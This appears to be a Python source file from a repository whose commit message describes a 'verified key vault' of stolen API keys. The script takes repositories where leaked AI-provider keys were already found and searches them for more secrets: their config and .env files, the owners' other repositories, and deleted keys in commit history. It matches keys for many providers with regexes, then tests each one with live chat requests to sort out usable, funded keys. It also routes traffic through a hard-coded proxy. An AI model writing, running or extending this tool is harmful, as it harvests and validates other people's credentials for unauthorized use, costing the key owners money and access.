Files
hack/tools/scripts/llm-key-hunter/hunt_pivot.py
T
chaos 5d215e1649 Add LLM key-hunter toolkit, vault, and skill
- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*,
  pivot miner, two-layer verify/content caches, per-provider verification)
- usable_keys: verified key vault across 12 providers (deepseek, minimax,
  volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.)
- .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow
- NewAPI channel import scripts and CDP capture helpers
- Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
2026-08-02 06:02:58 +08:00

751 lines
30 KiB
Python

#!/usr/bin/env python3
"""Horizontal pivot miner.
From every known LEAKED key source (usable_keys/*/keys.json "source" URLs),
pivot laterally to find MORE credentials:
Stage 1 Same repo -> pull the whole git tree, fetch high-value files
(.env*, config, secrets, yaml, py, js, json, ...)
and extract all known LLM key formats.
Stage 2 Same owner -> list the owner's other public repos, fetch their
root-level dotfiles/config/README, extract keys.
Stage 3 Same file -> list commits touching the seed file, fetch each
historical blob version, recover deleted keys.
All raw blob fetches are keyed by immutable (repo,path,sha) through
ContentCache so unchanged files are never re-crawled.
"""
import argparse, json, os, re, subprocess, sys, time
import urllib.request, urllib.error, urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent))
from content_cache import ContentCache, parse_raw_url
HERE = Path(__file__).resolve().parent
VAULT = HERE / "usable_keys"
RESULTS = HERE / "results" / "pivot"
RESULTS.mkdir(parents=True, exist_ok=True)
CAND_FILE = RESULTS / "candidates.txt"
CHECKPOINT = RESULTS / "candidates.checkpoint.json"
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
UA = "Mozilla/5.0 key-hunter"
_gh = None
def gh_opener():
global _gh
if _gh is None:
if GH_PROXY:
h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY})
_gh = urllib.request.build_opener(h)
else:
_gh = urllib.request.build_opener()
return _gh
_direct = None
def direct_opener():
global _direct
if _direct is None:
_direct = urllib.request.build_opener(urllib.request.ProxyHandler({}))
return _direct
# ---------------------------------------------------------------------------
# GitHub API helpers
# ---------------------------------------------------------------------------
def github_token():
tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
if tok:
return tok
try:
out = subprocess.run(["gh", "auth", "token"], capture_output=True,
text=True, timeout=10)
if out.returncode == 0:
return out.stdout.strip()
except FileNotFoundError:
pass
hosts = Path.home() / ".config" / "gh" / "hosts.yml"
if hosts.exists():
for line in hosts.read_text().splitlines():
line = line.strip()
if line.startswith("oauth_token:"):
return line.split(":", 1)[1].strip()
return None
def gh_api(url, token, wants_json=True):
headers = {"Accept": "application/vnd.github+json", "User-Agent": "key-hunter"}
if token:
headers["Authorization"] = f"Bearer {token}"
req = urllib.request.Request(url, headers=headers)
for attempt in range(6):
try:
with gh_opener().open(req, timeout=30) as resp:
raw = resp.read()
return json.loads(raw) if wants_json else raw
except urllib.error.HTTPError as e:
if e.code in (403, 429):
reset = e.headers.get("X-RateLimit-Reset")
wait = max(int(reset) - int(time.time()), 5) if reset else 30
print(f" rate-limited, waiting {wait}s...", file=sys.stderr)
time.sleep(wait + 1)
continue
if e.code in (404, 451):
return None
try:
e.read()
except Exception:
pass
return None
except Exception as e:
print(f" network: {e}", file=sys.stderr)
time.sleep(3)
return None
def fetch_raw(url):
req = urllib.request.Request(url, headers={"User-Agent": UA})
try:
with gh_opener().open(req, timeout=20) as resp:
return resp.read().decode("utf-8", "replace")
except Exception:
return ""
def make_cached_fetch(cc, fetcher=fetch_raw):
def cached(url):
repo, sha, path = parse_raw_url(url)
if repo and sha and path:
txt = cc.get(repo, path, sha)
if txt is not None:
return txt
txt = fetcher(url)
if txt:
cc.put(repo, path, sha, txt)
return txt
return fetcher(url)
return cached
# raw.githubusercontent.com refuses a blob SHA as the ref (404); it needs a
# branch/commit ref. So fetch by branch ref but key the cache on the immutable
# blob SHA we already got from the tree/contents API.
def fetch_blob(repo, path, blob_sha, branch, cc):
if blob_sha and len(blob_sha) == 40:
hit = cc.get(repo.lower(), path, blob_sha)
if hit is not None:
return hit
ref = branch or "HEAD"
txt = fetch_raw(
f"https://raw.githubusercontent.com/{repo}/{ref}/{path}")
if txt and blob_sha and len(blob_sha) == 40:
cc.put(repo.lower(), path, blob_sha, txt)
return txt
# ---------------------------------------------------------------------------
# Key format registry. Each pattern -> provider label + (scheme, host, path,
# model, auth-header style). We extract ALL formats from every pivoted file.
# Order matters: more specific prefixes first so sk-cp-/sk-sp-/sk-cx- are not
# swallowed by a generic sk- pattern.
# ---------------------------------------------------------------------------
PROVIDERS = {}
def _reg(name, pattern, base, models=(), auth="Bearer",
chat_path="/v1/chat/completions", context=None):
PROVIDERS[name] = {
"re": re.compile(pattern),
"base": base,
"models": models,
"auth": auth,
"chat_path": chat_path,
"context": [c.lower() for c in context] if context else None,
}
# Chinese coding plans / specialist
_reg("mimo", r"sk-cx-[A-Za-z0-9]{48}", "https://api.xiaomimimo.com",
models=("mimo-v2.5", "mimo-v2"), auth="Bearer")
_reg("minimax", r"sk-cp-[A-Za-z0-9_\-]{130,}", "https://api.minimaxi.com",
models=("MiniMax-M2.5", "abab6.5s-chat"))
_reg("codingplan", r"sk-sp-[0-9a-fA-F]{32}", "https://coding.dashscope.aliyuncs.com",
models=("qwen3-coder-plus", "qwen-coder-plus"))
_reg("longcat", r"ak_[0-9A-Za-z]{29}", "https://api.longcat.chat",
models=("LongCat-2.0-Chat", "LongCat-2.0"))
_reg("zyloo", r"sk-zy-[0-9A-Za-z]{20,}", "https://api.zyloo.io",
models=("Zyloo-1",))
# Generic LLM keys
_reg("deepseek", r"sk-[a-f0-9]{32}", "https://api.deepseek.com",
models=("deepseek-chat",))
_reg("dashscope", r"sk-[a-f0-9]{32}", "https://dashscope.aliyuncs.com",
models=("qwen-plus",))
_reg("moonshot", r"sk-[A-Za-z0-9]{40,60}", "https://api.moonshot.cn",
models=("moonshot-v1-8k",))
_reg("siliconflow",r"sk-[A-Za-z0-9]{48}", "https://api.siliconflow.cn",
models=("deepseek-ai/DeepSeek-V3",))
_reg("volcanoark", r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
"https://ark.cn-beijing.volces.com",
models=("doubao-seed-1-6-250615",),
context=("ark_api_key", "volc_accesskey", "volc_secret",
"api_key", "apikey", "authorization", "bearer",
"ark.cn-beijing.volces.com/api/v3", "base_url"))
_reg("xunfei", r"[0-9a-f]{32}",
"https://maas-coding-api.cn-huabei-1.xf-yun.com",
models=("xunfei-coding-plan",),
context=("xf-yun.com", "xfyun", "xunfei", "iflytek",
"spark-api", "maas-coding-api"))
_reg("openai", r"sk-[A-Za-z0-9]{48,}", "https://api.openai.com",
models=("gpt-4o-mini",))
_reg("anthropic", r"sk-ant-[A-Za-z0-9_\-]{80,}", "https://api.anthropic.com",
models=("claude-3-5-haiku-latest",), auth="x-api-key",
chat_path="/v1/messages")
_reg("groq", r"gsk_[A-Za-z0-9]{52}", "https://api.groq.com",
models=("llama-3.1-8b-instant",))
_reg("github_pat", r"gh[pousr]_[A-Za-z0-9]{36,}", "")
_reg("openrouter", r"sk-or-v1-[0-9a-f]{64}", "https://openrouter.ai",
models=("openai/gpt-4o-mini",))
_reg("together", r"[0-9a-f]{64}",
"https://api.together.xyz",
models=("meta-llama/Llama-3.1-8B-Instruct-Turbo",),
context=("together.xyz", "togetherai", "together_api",
"TOGETHER_API_KEY"))
# dedup across providers: longest/most-prefixed match wins for a given span
PREF_ORDER = ["mimo", "minimax", "codingplan", "longcat", "zyloo",
"anthropic", "groq", "github_pat", "openrouter",
"siliconflow", "moonshot", "openai",
"deepseek", "dashscope", "xunfei", "volcanoark", "together"]
BLACKLIST = ("your-", "example", "placeholder", "test", "xxxx", "00000000",
"1234567890abcdef", "changeme", "dummy", "fake", "redacted")
def looks_real(k):
low = k.lower()
return not any(b in low for b in BLACKLIST)
def extract_all(text):
"""Return {provider: set(keys)} found in text, longest-prefix-wins.
For providers with a 'context' requirement (ambiguous shapes like bare
UUIDs/hex), a match is only accepted if text within +/-80 chars around
the match contains a provider assignment marker (api key / base url)."""
low = (text or "").lower()
spans = [] # (start, end, key, provider)
for prov in PREF_ORDER:
spec = PROVIDERS[prov]
markers = spec.get("context")
for m in spec["re"].finditer(text or ""):
k = m.group(0)
if not looks_real(k):
continue
if markers:
lo = max(0, m.start() - 80)
hi = min(len(low), m.end() + 80)
window = low[lo:hi]
if not any(c in window for c in markers):
continue
spans.append((m.start(), m.end(), k, prov))
# sort by start then longer-first; greedy overlap removal
spans.sort(key=lambda s: (s[0], -(s[1] - s[0])))
out = {}
occupied = []
for st, en, k, prov in spans:
if any(st < e and en > s for s, e in occupied):
continue
occupied.append((st, en))
out.setdefault(prov, set()).add(k)
return out
# ---------------------------------------------------------------------------
# Verification (direct, no proxy). Only 401 => DEAD.
# ---------------------------------------------------------------------------
def http_chat(provider, key, timeout=25):
p = PROVIDERS[provider]
if not p["base"]:
return 0, "no-endpoint"
url = p["base"].rstrip("/") + p["chat_path"]
headers = {"User-Agent": UA, "Content-Type": "application/json"}
if p["auth"] == "x-api-key":
headers["x-api-key"] = key
headers["anthropic-version"] = "2023-06-01"
else:
headers["Authorization"] = f"Bearer {key}"
model = p["models"][0] if p["models"] else "gpt-4o-mini"
if provider == "anthropic":
body = {"model": model, "max_tokens": 4,
"messages": [{"role": "user", "content": "hi"}]}
else:
body = {"model": model, "max_tokens": 1,
"messages": [{"role": "user", "content": "hi"}]}
data = json.dumps(body).encode()
req = urllib.request.Request(url, data=data, headers=headers, method="POST")
try:
with direct_opener().open(req, timeout=timeout) as resp:
return resp.getcode(), resp.read().decode("utf-8", "replace")
except urllib.error.HTTPError as e:
try:
return e.code, e.read().decode("utf-8", "replace")
except Exception:
return e.code, ""
except Exception as e:
return 0, f"network: {type(e).__name__}: {e}"
def verify(provider, key):
code, body = http_chat(provider, key)
bl = (body or "").lower()
if code == 200:
if '"choices"' in bl or '"content"' in bl or '"id"' in bl:
return "USABLE", f"chat 200 OK ({body[:80]})"
if any(x in bl for x in ("balance", "quota", "arrear", "insufficient")):
return "NO_BALANCE", f"chat: {body[:100]}"
return "USABLE", f"chat: {body[:100]}"
if code == 401:
return "DEAD", "401 unauthorized"
if code in (402, 429):
return "NO_BALANCE", f"chat HTTP {code}: {body[:100]}"
if code == 0:
return "UNKNOWN", body[:120]
return "NO_ACCESS", f"chat HTTP {code}: {body[:100]}"
# ---------------------------------------------------------------------------
# Seed collection from vault
# ---------------------------------------------------------------------------
HTML_RE = re.compile(r"https://github\.com/([^/]+/[^/]+)/blob/([^/]+)/(.*)")
def parse_source(url):
if not url:
return None, None, None, None
m = HTML_RE.search(url)
if not m:
return None, None, None, None
repo, sha, path = m.group(1), m.group(2), m.group(3)
owner = repo.split("/", 1)[0]
return owner, repo, sha, urllib.parse.unquote(path)
def collect_seeds():
"""Return list of (owner, repo, sha, path, vault_provider) from vault."""
seeds = []
for kf in sorted(VAULT.glob("*/keys.json")):
prov = kf.parent.name
try:
arr = json.loads(kf.read_text())
except Exception:
continue
if isinstance(arr, dict):
arr = [arr]
for entry in arr:
if not isinstance(entry, dict):
continue
o, r, s, p = parse_source(entry.get("source", ""))
if r:
seeds.append((o, r, s, p, prov))
return seeds
# ---------------------------------------------------------------------------
# Stage 1: same-repo full tree walk -> high-value files
# ---------------------------------------------------------------------------
HOT_EXT = (".env", ".env.local", ".env.production", ".env.development",
".yaml", ".yml", ".json", ".toml", ".ini", ".conf", ".config",
".py", ".js", ".ts", ".jsx", ".tsx", ".go", ".java", ".rb",
".php", ".sh", ".ps1", ".properties", ".txt", ".md", ".example",
".local", ".secret", ".cfg")
HOT_NAMES = (".env", "config", "secret", "credential", "apikey", "api_key",
"key", "token", "auth", "setting", "constant", "default",
"application", "app", "env", "private")
SKIP_DIRS = ("node_modules", ".git", "vendor", "dist", "build", "__pycache__",
".next", "target", "venv", ".venv", "site-packages", ".tox")
MAX_FILES_PER_REPO = 120
MAX_BYTES = 900_000
def is_hot(path):
low = path.lower()
base = low.rsplit("/", 1)[-1]
if any(sd + "/" in low for sd in SKIP_DIRS):
return False
if base.startswith(".env") or base.endswith(".env"):
return 3 # highest priority
if any(h in base for h in ("secret", "credential", "apikey", "api_key",
"token", "auth", "private")):
return 3
if any(h in base for h in ("config", "setting", "constant", "default",
"application", "app", "env")):
return 2
if any(low.endswith(e) for e in (".secret", ".cfg", ".ini", ".conf",
".properties", ".local", ".pem",
".key")):
return 2
if low.endswith((".yaml", ".yml", ".toml", ".json")):
return 1
if low.endswith((".py", ".js", ".ts", ".jsx", ".tsx", ".go", ".java",
".rb", ".php", ".sh", ".ps1")):
return 1
return 0
def repo_tree_paths(repo, token):
"""Use git/trees?recursive=1 on default branch; yield (prio,path,sha,branch)."""
data = gh_api(f"https://api.github.com/repos/{repo}", token)
if not data:
return
branch = data.get("default_branch", "main")
url = (f"https://api.github.com/repos/{repo}/git/trees/"
f"{branch}?recursive=1")
tree = gh_api(url, token)
if not tree or "tree" not in tree:
return
for node in tree.get("tree", []):
prio = is_hot(node.get("path", ""))
if node.get("type") == "blob" and prio:
yield prio, node["path"], node.get("sha", ""), branch
if tree.get("truncated"):
print(f" [warn] {repo} tree truncated, results partial",
file=sys.stderr)
def stage_repo(repo, token, cc, candidates, seen_files, stats,
fetch_workers=12):
scored = sorted(repo_tree_paths(repo, token),
key=lambda t: -t[0])[:MAX_FILES_PER_REPO]
jobs = []
for _prio, path, bsha, branch in scored:
key = (repo.lower(), path.lower(), str(bsha).lower())
if key in seen_files:
continue
seen_files.add(key)
jobs.append((path, bsha, branch))
def _fetch(job):
path, bsha, branch = job
return path, fetch_blob(repo, path, bsha, branch, cc)
with ThreadPoolExecutor(max_workers=fetch_workers) as ex:
for path, txt in ex.map(_fetch, jobs):
if not txt or len(txt) > MAX_BYTES:
continue
for prov, keys in extract_all(txt).items():
for k in keys:
if k not in candidates:
candidates[k] = (prov, f"{repo}/{path}")
stats["files_with_keys"] += 1
# ---------------------------------------------------------------------------
# Stage 2: same-owner other repos
# ---------------------------------------------------------------------------
def owner_repos(owner, token, max_repos=30):
for page in range(1, 3):
url = ("https://api.github.com/users/"
f"{urllib.parse.quote(owner)}/repos?per_page=100&page={page}"
"&sort=updated&type=owner")
data = gh_api(url, token)
if not data:
return
for r in data:
if r.get("fork"):
continue
name = r.get("full_name", "")
if name and name.lower().split("/", 1)[0] == owner.lower():
yield name
if len(data) < 100:
return
ROOT_HOT = (".env", ".env.local", ".env.production", "config.json",
"config.yaml", "config.yml", "config.toml", "settings.json",
"appsettings.json", "application.yml", "application.yaml",
"secrets.json", ".env.example", "README.md", ".env.sample")
def stage_owner(owner, exclude_repo, token, cc, candidates,
seen_files, stats):
nrepos = 0
for repo in owner_repos(owner, token):
if repo.lower() == exclude_repo.lower():
continue
nrepos += 1
if nrepos > 30:
break
meta = gh_api(f"https://api.github.com/repos/{repo}", token)
branch = (meta or {}).get("default_branch", "main")
url = f"https://api.github.com/repos/{repo}/contents/"
items = gh_api(url, token)
if not items:
continue
for it in items:
if not isinstance(it, dict):
continue
p = it.get("path", "")
if it.get("type") == "file" and (p.lower() in ROOT_HOT or
is_hot(p)):
bsha = it.get("sha", "")
key = (repo.lower(), p.lower(), str(bsha).lower())
if key in seen_files:
continue
seen_files.add(key)
txt = fetch_blob(repo, p, bsha, branch, cc)
if not txt or len(txt) > MAX_BYTES:
continue
for prov, keys in extract_all(txt).items():
for k in keys:
if k not in candidates:
candidates[k] = (prov, f"{repo}/HEAD/{p}")
stats["files_with_keys"] += 1
# ---------------------------------------------------------------------------
# Stage 3: per-seed-file commit history
# ---------------------------------------------------------------------------
def list_file_commits(repo, path, token, max_commits=6):
url = ("https://api.github.com/repos/" + repo + "/commits"
f"?path={urllib.parse.quote(path)}&per_page={max_commits}")
data = gh_api(url, token)
if not data:
return []
out = []
for c in data:
try:
out.append(c["sha"])
except Exception:
pass
return out
def stage_history(owner, repo, sha, path, token, cached_fetch,
candidates, seen_files, stats):
for csha in list_file_commits(repo, path, token):
url = f"https://raw.githubusercontent.com/{repo}/{csha}/{path}"
key = (repo.lower(), path.lower(), csha.lower())
if key in seen_files:
continue
seen_files.add(key)
txt = cached_fetch(url)
if not txt or len(txt) > MAX_BYTES:
continue
for prov, keys in extract_all(txt).items():
for k in keys:
if k not in candidates:
candidates[k] = (prov, f"{repo}@{csha[:8]}/{path}")
stats["files_with_keys"] += 1
# ---------------------------------------------------------------------------
# Driver
# ---------------------------------------------------------------------------
def load_existing():
"""Keys already known in vault -> set, to skip re-verifying."""
known = set()
for kf in VAULT.glob("*/keys.json"):
try:
arr = json.loads(kf.read_text())
except Exception:
continue
if isinstance(arr, dict):
arr = [arr]
for e in arr:
if isinstance(e, dict) and e.get("key"):
known.add(e["key"])
return known
def verify_candidates(candidates, workers, use_cache=True):
from verify_cache import CachedVerifier
# group by provider
by_prov = {}
for k, (prov, src) in candidates.items():
if not PROVIDERS[prov]["base"]:
continue # no endpoint (github_pat etc) - skip chat verify
by_prov.setdefault(prov, []).append((k, src))
verdicts = {v: [] for v in ("USABLE", "NO_BALANCE", "NO_ACCESS",
"DEAD", "UNKNOWN")}
for prov, items in sorted(by_prov.items()):
print(f" [verify] {prov}: {len(items)} candidates")
def vfn(k, _prov=prov):
return verify(_prov, k)
if use_cache:
ver = CachedVerifier(f"pivot_{prov}", vfn)
ver.__enter__()
else:
ver = None
try:
with ThreadPoolExecutor(max_workers=workers) as ex:
futs = {ex.submit(ver if ver else vfn, k): (k, src)
for k, src in items}
for fut in as_completed(futs):
k, src = futs[fut]
try:
v, d = fut.result()
except Exception as e:
v, d = "UNKNOWN", str(e)
verdicts.setdefault(v, []).append((k, src, d))
if v == "USABLE":
print(f" [+] USABLE {prov} {k[:18]}... {src}")
finally:
if ver:
ver.__exit__(None, None, None)
return verdicts
def write_candidates(candidates):
with open(CAND_FILE, "w") as f:
for k, (prov, src) in sorted(candidates.items(),
key=lambda x: (x[1][0], x[0])):
f.write(f"{prov}\t{k}\t{src}\n")
def write_verdicts(verdicts):
summary = {}
for v, rows in verdicts.items():
with open(RESULTS / f"{v.lower()}.txt", "w") as f:
for k, src, d in rows:
f.write(f"{k}\t{src}\t{d}\n")
summary[v] = len(rows)
with open(RESULTS / "summary.json", "w") as f:
json.dump(summary, f, indent=2)
print("=== verdicts:", summary)
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--workers", type=int, default=16)
ap.add_argument("--fetch-workers", type=int, default=12)
ap.add_argument("--no-owner", action="store_true",
help="skip stage 2 (owner repo pivot)")
ap.add_argument("--no-history", action="store_true",
help="skip stage 3 (commit history)")
ap.add_argument("--no-tree", action="store_true",
help="skip stage 1 (same-repo tree)")
ap.add_argument("--no-content-cache", action="store_true")
ap.add_argument("--no-cache", action="store_true",
help="skip verdict cache")
ap.add_argument("--verify-only", action="store_true")
ap.add_argument("--reextract", action="store_true",
help="re-extract from cached blobs with tightened "
"patterns (no network), then verify")
ap.add_argument("--max-repos", type=int, default=0,
help="limit seed repos (0=all)")
args = ap.parse_args()
token = github_token()
if not token:
print("WARNING: no GitHub token; rate limits will be tight",
file=sys.stderr)
seeds = collect_seeds()
print(f"seeds: {len(seeds)} leaked-key sources")
if args.max_repos:
seeds = seeds[:args.max_repos]
# dedup seed repos / owners
seed_repos = sorted({s[1] for s in seeds})
seed_owners = sorted({s[0] for s in seeds})
print(f" {len(seed_repos)} distinct repos, {len(seed_owners)} owners")
if args.verify_only:
cand = {}
for line in CAND_FILE.read_text().splitlines():
parts = line.split("\t")
if len(parts) == 3:
cand[parts[1]] = (parts[0], parts[2])
print(f"loaded {len(cand)} candidates from {CAND_FILE}")
verdicts = verify_candidates(cand, args.workers,
use_cache=not args.no_cache)
write_verdicts(verdicts)
return
if args.reextract:
print("[reextract] scanning cached blobs with tightened patterns")
known = load_existing()
cc = ContentCache(force=args.no_content_cache)
cc.__enter__()
candidates = {}
nfiles = 0
for repo, files in cc._data.items():
for path, versions in files.items():
for sha, ent in versions.items():
txt = ent.get("c", "") if isinstance(ent, dict) else ""
if not txt:
continue
nfiles += 1
src = f"{repo}/{path}"
for prov, keys in extract_all(txt).items():
for k in keys:
if k not in known and k not in candidates:
candidates[k] = (prov, src)
cc.__exit__(None, None, None)
print(f"[reextract] scanned {nfiles} blobs, "
f"{len(candidates)} new candidates")
write_candidates(candidates)
if candidates:
verdicts = verify_candidates(candidates, args.workers,
use_cache=not args.no_cache)
write_verdicts(verdicts)
return
known = load_existing()
print(f"already in vault: {len(known)} keys")
def save_checkpoint():
try:
tmp = str(CHECKPOINT) + ".tmp"
with open(tmp, "w") as f:
json.dump({"candidates": {k: list(v) for k, v in
candidates.items()}}, f)
os.replace(tmp, CHECKPOINT)
except Exception as e:
print(f" [warn] checkpoint failed: {e}", file=sys.stderr)
candidates = {}
if CHECKPOINT.exists() and not args.no_cache:
try:
ch = json.loads(CHECKPOINT.read_text())
for k, v in ch.get("candidates", {}).items():
candidates[k] = tuple(v)
print(f"resumed {len(candidates)} candidates from checkpoint")
except Exception:
pass
stats = {"files_with_keys": 0}
cc = ContentCache(force=args.no_content_cache)
with cc:
cf = make_cached_fetch(cc)
seen_files = set()
# Stage 1: same repo tree
if not args.no_tree:
print(f"[stage 1] same-repo tree walk ({len(seed_repos)} repos)")
for i, repo in enumerate(seed_repos, 1):
stage_repo(repo, token, cc, candidates, seen_files, stats,
fetch_workers=args.fetch_workers)
if i % 5 == 0:
save_checkpoint()
if i % 10 == 0:
print(f" {i}/{len(seed_repos)} repos, "
f"{len(candidates)} candidates", flush=True)
# Stage 2: owner other repos
if not args.no_owner:
print(f"[stage 2] owner pivot ({len(seed_owners)} owners)")
repo_owner = {s[1]: s[0] for s in seeds}
for i, repo in enumerate(seed_repos, 1):
owner = repo_owner.get(repo, repo.split("/", 1)[0])
stage_owner(owner, repo, token, cc, candidates,
seen_files, stats)
time.sleep(1.0) # smooth request burst vs secondary rate limit
if i % 5 == 0:
save_checkpoint()
if i % 10 == 0:
print(f" {i}/{len(seed_repos)} owners, "
f"{len(candidates)} candidates", flush=True)
# Stage 3: commit history per seed file
if not args.no_history:
print(f"[stage 3] commit history ({len(seeds)} seed files)")
for i, (owner, repo, sha, path, prov) in enumerate(seeds, 1):
stage_history(owner, repo, sha, path, token, cf,
candidates, seen_files, stats)
if i % 25 == 0:
save_checkpoint()
print(f" {i}/{len(seeds)} files, "
f"{len(candidates)} candidates", flush=True)
save_checkpoint()
# strip keys already known
new_cand = {k: v for k, v in candidates.items() if k not in known}
print(f"[done] {len(candidates)} total extracted, "
f"{len(new_cand)} new (not in vault); "
f"{stats['files_with_keys']} files yielded keys")
write_candidates(new_cand)
if new_cand:
verdicts = verify_candidates(new_cand, args.workers,
use_cache=not args.no_cache)
write_verdicts(verdicts)
else:
print("no new candidates to verify")
if __name__ == "__main__":
main()